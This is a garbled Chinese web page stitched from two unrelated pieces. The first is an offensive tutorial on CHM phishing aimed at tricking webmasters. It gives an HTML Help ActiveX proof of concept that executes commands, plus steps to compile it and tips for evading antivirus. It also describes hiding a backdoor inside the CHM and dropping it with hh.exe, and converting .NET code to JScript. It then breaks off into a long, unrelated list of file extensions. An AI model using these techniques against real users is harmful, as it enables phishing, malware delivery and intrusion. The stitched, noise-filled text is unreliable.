�����、CHM釣魚
進行釣魚選擇合適的payload非常重要���,使用一些容易讓人放松警惕的文件格式可以大大提高釣魚的成功率���。CHM是微軟推出的基于HTML的幫助文件系統��,被 IE 瀏覽器支持的JavaScript, VBScript, ActiveX,等,CHM同樣支持���。因此使用CHM作為釣魚的payload非常合適。
上述的總體意思就是���,可以讓更多站長上當,這里充分了利用到了社會工程學
1) ��、使用com控件命令執行
根據@ithurricanept的推特
使用了js啟動com控件執行命令
原始碼如下:
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
POC
使用HTML幫助研討會
創建一個新的項目���,添加文件后進行編譯
選擇新
記住這里千萬不要打勾
隨便輸入記住帶.hpp后綴
隨便選擇一個
然后選擇new之后選擇HTML文件
然后輸入我們剛才的poc
寫完之后ctrl + s保存
記住保存的地址
然后點擊這個
選擇添加把我們剛寫的文件添加進去
然后點擊ok
隨后點擊這個
得到地址去訪問���。發現便執行了命令
利用
實際測試的時候注意了以下幾點:
執行命令的時候注意預定的參數與程序名需要用逗號替換��,參數與參數之間不需要��。
考慮到進行敏感操作會導致殺軟提示,因此應避免使用powershell,bitsadmin��,certutil���,cscript等��。
通過cmd執行命令也屬于敏感操作���,因此使用多個控件依次執行命令���。
在搜索的過程中發現.chm文件的替換程序hh.exe具有反編譯功能(反編譯��,將chm返回成html,其實就類似chm可以比喻成一個壓縮包���,decompile是解壓縮)的功能,可以將打包進chm的文件釋放出來
HH.EXE -decompile D:/xTemp/decompile-folder C:/xTemp/XMLconvert.chm
hh -decompile目標文件夾源CHM文件名
這句話的意思
因此可以將后門程序一起打包進chm文件中,運行時調用hh.exe釋放chm中的后門程序再執行���。
測試:
使用360測試的時候效果不太理想,在聯網情況下使用hh.exe反編譯會被攔截,斷網情況下沒有問題。
使用火絨測試沒有任何攔截���。
3、使用js加載.net
既然可以利用chm執行js,那為什么不內嵌.net和dll呢��?
POC
編寫一個.net dll
namespace ClassLibrary1{ public class Class1 { public Class1() { /* Start notepad */ Process.Start("notepad.exe"); } }}
生成js腳本
DotNetToJScript.exe -o 1.js ClassLibrary1.dll -c ClassLibrary1.Class1
一篇文章講了一些電腦常用的后綴名即擴展名���,這篇文章就來給大家提供一個大全��。首先聲明這篇文章不是我原創��,是借鑒的其他電腦方面大神的總結匯總,可以說是擴展名、后綴名的大全了,不得不佩服��,好多格式我都沒見過���,請查收:(如有侵權請聯系我刪除���,謝謝?����。?/p>
按照字母順序排列:
A開頭:
ACE:Ace壓縮檔案格式�����;
ACT:Microsoft office助手文件;
AIF,AIFF:音頻互交換文件�����,Silicon Graphic and Macintosh應用程序的聲音格式���;
ANI:Windows系統中的動畫光標���;
ARC:LH ARC的壓縮檔案文件���;
ARJ:Robert Jung ARJ壓縮包文件��;
ASD:Microsoft Word的自動保存文件;
ASF:Microsoft高級流媒體格式文件���;
ASM:匯編語言源文件,Pro/E裝配文件���;
ASP:動態網頁文件 ProComm Plus安裝與連接腳本文件 Astound介紹文件;
AST:Astound多媒體文件 ClarisWorks"助手"文件�����;
Axx:ARJ壓縮文件的分包序號文件��,用于將一個大文件壓至幾個小的壓縮包中(xx代表01-99的數字)���;
A3L:Authorware 3.x庫文件��;
A4L:Authorware 4.x庫文件;
A5L:Authorware 5.x庫文件���;
A3M,A4M:Authorware Macintosh未打包文件�����;
A3W���,A4W��,A5W:未打包的Authorware Windows文件;
B開頭:
BAK:備份文件���;
BAS:BASIC源文件;
BAT:批處理文件�����;
BIN:二進制文件;
BINHex:蘋果的一種編碼格式�����;
BMP:Windows或OS/2位圖文件���;
BOOK:Adobe FrameMaker Book文件��;
BOX:Lotus Notes的郵箱文件�����;
BPL:Borlard Delph 4打包庫;
BSP:Quake圖形文件�����;
BUN:CakeWalk 聲音捆綁文件(一種MIDI程序)���;
C開頭:(最多)
C0l:臺風波形文件��;
CAB:Microsoft壓縮檔案文件���;
CAD:Softdek的Drafix CAD文件��;
CAM:Casio照相機格式;
CAP:壓縮音樂文件格式���;
CAS:逗號分開的ASCⅡ文件��;
CCB:Visual Basic動態按鈕配置文件��;
CCH:Corel圖表文件;
CCO:CyberChat數據文件;
CCT:Macromedia Director Shockwave投影;
CDA:CD音頻軌道�����;
CDF:Microsoft頻道定義格式文件�����;
CDI:Philip的高密盤交互格式�����;
CDM:Visual dBASE自定義數據模塊文件;
CDR:CorelDRAW繪圖文件 原始音頻CD數據文件��;
CDT:CorelDRAW模板��;
CDX:CorelDRAW壓縮繪圖文件 Microsoft Visual FoxPro索引文件���;
CFG:配置文件���;
CGI:公共網關接口腳本文件��;
CGM:計算機圖形元文件;
CH:OS/2配置文件;
CHK:由Windows磁盤碎片整理器或磁盤掃描保存的文件碎片;
CHM:編譯過的HTML文件�����;
CHP:Ventura Publisher章節文件�����;
CHR:字符集(字體文件);
CHT:ChartViem文件 Harvard Graphics矢量文件��;
CIF:Adaptec CD 創建器 CD映像文件��;
CIL:Clip Gallery下載包���;
CIM:SimCity 2000文件�����;
CIN:OS/2改變控制文件用于跟蹤INI文件中的變化��;
CLASS:Java類文件;
CLP:Windows 剪貼板文件;
CLL:Crick Software Clicker文件�����;
CLS:Visual Basic類文件���;
CMD:Windows NT���,OS/2的命令文件 DOS CD/M命令文件 dBASEⅡ程序文件���;
CPI:Microsoft MS-DOS代碼頁信息文件�����;
CPL:控制面板擴展名��,Corel顏色板;
CPP:C++代碼文件;
CPR:Corel提供說明書文件;
CPT:Corel 照片-繪畫圖像��;
CST:Macromedia Director Cast文件��;
CUR:Windows光標文件;
D開頭:
DBF:dBASE文件���,可用數據文件(能被Excel97打開) Oracle 8.1.x表格空間文件
DBX:DataBearn圖像 Microsoft Visual FoxPro表格文件;
DCT:Microsoft Visual FoxPro數據庫容器���;
DCU:Delphi編譯單元文件;
DCX:Microsoft Visual FoxPro數據庫容器 基于PCX的傳真圖像宏��;
DIR:MacromediaDirector文件��;
DLL:動態鏈接庫��;
DOC:Word文檔文件;
DOT:Microsoft Word文檔模板�����;
DPL:Borland Delph 3壓縮庫���;
DRV:驅動程序��;
DRW:Micrografx Designer/Draw Pro/E繪畫文件�����;
DSF:Micrografx Designer VFX文件;
DSG:DOOM保存的文件��;
DSM:Dynamic Studio音樂模塊(MOD)文件��;
DSP:Microsoft Developer Studio工程文件�����;
DSQ:Corel QUERY(查詢)文件��;
DST:刺繡機圖形文件�����;
DSW:Microsoft Developer Studio工作區文件;
DTA:World Bank(世界銀行)的STARS數據文件���;
DTD:SGML文檔類型定義(DTD)文件;
DTED:地面高度數字數據(圖形的數據格式)文件���;
DTF:Symantec Q&A相關的數據庫數據文件;
DTM:DigiTrakker模塊文件���;
DUN:Microsoft拔號網絡導出文件;
DV:數字視頻文件(MIME)���;
DWG:AutoCAD工程圖文件 AutoCAD或Generic CADD老版本的繪圖格式;
DXR:Macromedia Director受保護(不可編輯)電影文件;
E開頭:
EDA:Ensoniq ASR磁盤映像;
EDD:元素定義文檔(FrameMaker+SGML文檔);
EDE:Ensoniq EPS磁盤映像���;
EDK:Ensoniq KT磁盤映像���;
EDQ:Ensoniq SQ1/SQ2/Ks32磁盤映像�����;
EDS:Ensoniq SQ80磁盤映像;
EDV:Ensoniq VFX-SD磁盤映像��;
EFA:Ensoniq ASR文件���;
EFE:Ensoniq EPS文件���;
EFK:Ensoniq KT文件�����;
EFQ:Ensoniq SQ1/SQ2/Ks32文件;
EFS:Ensoniq SQ80文件�����;
EFV:Ensoniq VFX-SD文件���;
EMD:ABT擴展模塊��;
EMF:Windows增強元文件���;
EML:Microsoft Outlook Express郵件消息(MIME RTC822)文件�����;
EXE:可執行文件或程序;
F開頭
FAV:Microsoft Outlook導航條;
FAX:傳真類型圖像���;
FCD:虛擬CD-ROM;
FDF:Adobe Acrobat表單文檔文件;
FLA:Macromedia Flash電影��;
FND:Microsoft Explorer保存的搜索文件(Find applet)��;
FON:系統字體���;
FRT:Microsoft FoxPro報表文件���;
FRX:Visual Basic表單文本 Microsoft FoxPro報表文件�����;
FXP:經Microsoft FoxPro編譯的源文件��;
G開頭:
GDM:鈴聲���、口哨聲和聲音板模塊格式��;
GetRight:GetRight未完成的下載文件;
GHO:Norton 克隆磁盤映像���;
GID:Windows 95全局索引文件(包括幫助狀態);
GIF:CompuServe位圖文件�����;
GL:動畫格式�����;
GRP:程序管理組�����;
H開頭:
HEX:Macintosh BinHex2.0文件;
HLP:Windows幫助文件��;
HPP:C++程序頭文件���;
HQX:Macintosh BinHex 4.0文件;
HT:HyperTerminal(超級終端);
HTM,HTML:超文本文檔��;
HTT:Microsoft超文本模板���;
HTX:擴展HTML模板�����;
I開頭:
ICO:Windows圖標;
IDX:Microsoft FoxPro相關數據庫索引文件 Symantec Q&A相關數據庫索引文件���;
Express文件;
IMG:GEM映像��;
INF:信息文件��;
INI:初始化文件 ���;
INP:Oracle 3.0版或早期版本的表單源代碼��;
INRS:INRS遠程通信聲頻;
INS:InstallShield安裝腳本 X-Internet簽字文件�����;
INT:中間代碼���,當一個源程序經過語法檢查后編譯產生一個可執行代碼��;
IOF:Findit文檔��;
IQY:Microsoft Internet查詢文件;
ISO:根據ISD 9660有關CD-ROM文件系統標準列出CD-ROM上的文件�����;
ISP:X-Internet簽字文件��;
IST:數字跟蹤設備文件���;
ISU:InstallShield卸裝腳本��;
IT:脈沖跟蹤系統音樂模塊(MOD)文件;
ITI:脈沖跟蹤系統設備���;
ITS:脈沖跟蹤系統抽樣�����,Internet文檔位置�����;
IV:Open Inventor中使用的文件格式;
IVD:超過20/20微觀數據維數或變量等級文件;
IVP:超過20/20的用戶子集配置文件��;
IVT:超過20/20表或集合數據文件�����;
IVX:超過20/20微數據目錄文件��;
IW:Idlewild屏幕保護程序;
IWC:Install Watch文檔;
J開頭
J62:Ricoh照相機格式��;
JAR:Java檔案文件(一種用于applet和相關文件的壓縮文件)���;
JAVA:Java源文件���;
JAR:Java檔案文件(一種用于applet和相關文件的壓縮文件)��;
JAVA:Java源文件���;
JFF��,JFIF�����,JIF:JPEG文件�����;
JPE�����,JPEG,JPG:JPEG圖形文件;
JS:javascript源文件��;
JSP:HTML網頁��,其中包含有對一個Java servlet的參考���;
K開頭:
KAR:卡拉OK MIDI文件(文本+MIDI)�����;
L開頭:
LAB:Visual dBASE標簽文件;
LBT,LBX:Microsoft FoxPro標簽文件;
LDB:Microsoft Access加鎖文件�����;
LHA:LZH更換文件后綴��;
LOG:日志文件��;
LZH:LH ARC壓縮檔案;
M開頭:
M1V:MPEG相關文件(MIME"mpeg"類型);
M3D:Corel Motion 3D動畫文件�����;
M3U:MPEG URL(MIME聲音文件)��;
MAM:Microsoft Access宏;
MAQ:Microsoft Access查詢文件���;
MAR:Microsoft Access報表文件;
MBX:Microsoft Outlook保存email格式���;
MCW:Microsoft Word的Macintosh文檔;
MDB:Microsoft Access數據庫���;
MDN:Microsoft Access空數據庫模板;
MDW:Microsoft Access工作組文件�����;
MID:MIDI音樂�����;
MMM:Microsoft多媒體電影���;
MOV:QuickTime for Windows電影���;
MP2:第二層MPEG音頻文件�����;
MP3:第三層MPEG音頻文件;
MPA:MPEG相關文件���,MIME"mpeg類型";
MPE��,MPEG��,MPG:MPEG動畫文件�����;
MPP:Microsoft工程文件 CAD繪圖文件格式;
MPR:Microsoft FoxPro菜單(已編譯)�����;
MSI:Windows 安裝器包���;
MSN:Microsoft 網絡文檔 Descent Mission文件��;
O開頭:
OBD:Microsoft Office活頁夾���;
OBJ:對象文件��;
OBZ:Microsoft Office活頁夾向導;
OCX:Microsoft對象鏈接與嵌入定制控件���;
ODS:Microsoft Outlook Express郵箱文件;
OFT:Microsoft Outlook模板��;
OPX:OPL擴展DLL(動態鏈接庫)���;
OSS:Microsoft Office查找文件�����;
OST:Microsoft Exchange / Outlook 離線文件��;
P開頭:
PAL:壓縮文件;
PART:Go��!Zilla部分下載文件��;
PAS:Pascal源代碼���;
PCS:PICS動畫文件;
PDF:可導出文檔格式文件(可用Web瀏覽器顯示) Microsoft系統管理服務器包定義文件;
PHP,PHP3:包含有PHP腳本的HTML網頁;
PHTML:包含有PHP腳本的HTML網頁 由Perl分析解釋的HTML��;
PM5:Pagemaker 5.0文件�����;
PM6:Pagemaker 6.0文件���;
PPS:Microsoft Powerpoint幻燈片放映���;
PPT:Microsoft Powerpoint演示文稿���;
PRF:Windows系統文件���,Macromedia導演設置文件��;
PSD:Adobe photoshop位圖文件;
PSM:Protracker Studio模型格式 Epic游戲的源數據文件;
PST:Microsoft Outlook個人文件夾文件�����;
PWL:Windows 95口令列表文件��;
Q開頭:
QIF:QuickTime相關圖像(MIME) Quicken導入文件�����;
QT,QTM:QuickTime電影;
QTI,QTIF:QuickTime相關圖像�����;
QTP:QuickTime優先文件���;
QTS:Mac PICT圖像文件 QuickTime相關圖像���;
QTX:QuickTime相關圖像�����;
R開頭:
RA:RealAudio聲音文件��;
RAM:RealAudio元文件;
RAR:RAR壓縮檔案(Eugene Roshall格式);
REC:錄音機宏 RapidComm聲音文件�����;
REG:注冊表文件�����;
REP:Visual dBASE報表文件���;
RES:Microsoft Visual C++資源文件��;
RM:RealAudio視頻文件;
RMF:Rich Map格式;
ROM:基于盒式磁帶的家庭游戲仿真器文件;
Rxx:多卷檔案上的RAR壓縮文件(xx代表1~99間的一個數字);
S開頭:
SAV:游戲保存文件;
SB:原始帶符號字節(8位)數據��;
SBK:Creative Labs的Soundfont 1.0 Bank文件 (Soundb laster)/EMU SonndFont v1.x Bank文件���;
SBL:Shockwave Flash對象文件��;
SCF:Windows Explorer命令文件��;
SCH:Microsoft Schedule+1;
SCP:撥號網絡腳本文件���;
SCR:Windows屏幕保護 傳真圖像 腳本文件�����;
SFX:RAR自解壓檔案�����;
SHTML:含有服務器端包括(SSI)的HTML文件;
SPL:Shockwave Flash對象 DigiTrakker抽樣�����;
SQL:Informix SQL查詢 通常被數據庫產品用于SQL查詢(腳本���、文本���、二進制)的文件擴展名��;
STM:.shtml的短后綴形式���,含有一個服務端包括(SSI)的HTML文件 Scream Tracker V2音樂模塊(MOD)文件��;
STR:屏幕保護文件;
SWA:在Macromedia導演文件(MP3文件)中的Shockwave聲音文件���;
SYS:系統文件;
T開頭:
T64:Commodore 64仿真器磁帶映像文件���;
THEME:Windows 95桌面主題文件;
TIF�����,TIFF:標簽圖像文件格式(TIFF)位圖�����;
TMP:Windows臨時文件;
TRM:終端文件���;
TXT:ASCⅡ文本格式的聲音數據;
TZ:老的壓縮格式文件���;
V開頭:
VBA:VBase文件;
VBP:Microsoft Visual Basic工程文件���;
VBW:Microsoft Visual Basic工作區文件;
VBX:Microsoft Visual Basic用戶定制控件;
VQE�����,VQL:Yamaha Sound-VQ定位器文件;
VQF:Yamaha Sound-VQ文件(可能出現標準)�����;
VRF:Oracle 7配置文件��;
VSL:下載列表文件(GetRight)���;
W開頭:
WAB:Microsoft Outlook文件���;
WAD:包含有視頻��、玩家水平和其他信息的DOOM游戲的大文件;
WAL:Quake 2正文文件�����;
WAV:Windows波形聲形��;
WBK:Microsoft Word備份文件;
WFM:Visual dBASE Windows表單��;
WFN:在CorelDRAW中使用的符號�����;
WIZ:Microsoft Word向導�����;
WRL:虛擬現實模型;
WWL:Microsoft Word內插器文件;
X開頭:
XLK:Microsoft Excel備份���;
XLL:Microsoft Excel內插器文件;
XLM:Microsoft Excel宏;
XLS:Microsoft Excel工作單���;
XLT:Microsoft Excel模板;
XLV:Microsoft Excel VBA模塊;
XLW:Microsoft Excel工作簿/工作區�����;
Z開頭:
ZAP:Windows軟件安裝配置文件���;
ZIP:Zip文件���;
數字開頭:
000-999:用于為老版本(或備份)文件編號(比如:被安裝程序改變的CONFIG.SYS文件) 又可用于為小范圍的PC應用程序的多個用戶相關數據文件編號��;
12M:Lotus 1-2-3 97 SmartMaster文件�����;
123:Lotus 1-2-3 97文件;
2D:VersaCAD的2維繪畫文件;
2GR,3GR:在Windows之下的VGA圖形驅動程序/配置文件���;
386:在386或更高級處理器上使用的文件���;
3D:VersaCAD的3維繪畫文件���;
3DM:3D NURBS建模器�����;
3DS:3D Studio(DOS下)格式文件��;
4GE:Informix 4GL編譯后代碼;
4GL:Informix 4GL源代碼���。
好了,以上就是文件擴展名即后綴名的大全了���,我也做了一回知識的搬運工,就是不知道這樣算不算抄襲呢���?各大發文平臺會不會判我違規���?也無所謂了���,我的目的是讓更多的人看到和學習�����,能夠幫助更多的人,只要能達到這個目標,其他的都不重要了���。
